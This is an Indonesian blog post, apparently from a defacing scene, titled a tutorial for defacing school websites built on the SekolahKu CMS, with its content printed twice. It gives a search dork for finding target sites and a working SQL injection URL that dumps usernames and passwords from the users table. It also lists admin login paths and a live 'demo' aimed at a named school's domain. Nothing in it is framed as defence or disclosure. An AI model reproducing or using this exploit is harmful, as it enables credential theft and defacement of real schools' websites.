Tutorial Deface CMS SekolahKu.
Rabu, 11 Maret 2020
Welkombek with me kali ini saya akan membagikan Tutorial Deface CMS SekolahKu.
Langsung Ae;v
Dork :
"Developed by sekolahku.web.id"
Exploit :
/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
Admin Login : www.site.sch.id/Login
www.site.sch.id/Administrator
www.site.sch.id/adminweb
( Note : Cari sendiri jangan mau di suapin mulu )
Demo : http://smkmuhammadiyahpamotan.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
Pokoknya ga beda jauh sama sql lokomedia, selanjutnya kembangin sendiri. cuma hashnya yang kuat, kalo ga bisa hash ya tebak tebakan aja :v
Langsung Ae;v
Dork :
"Developed by sekolahku.web.id"
Exploit :
/home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
Admin Login : www.site.sch.id/Login
www.site.sch.id/Administrator
www.site.sch.id/adminweb
( Note : Cari sendiri jangan mau di suapin mulu )
Demo : http://smkmuhammadiyahpamotan.sch.id/home/get_agenda_sekolah?end=1%27union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+
Pokoknya ga beda jauh sama sql lokomedia, selanjutnya kembangin sendiri. cuma hashnya yang kuat, kalo ga bisa hash ya tebak tebakan aja :v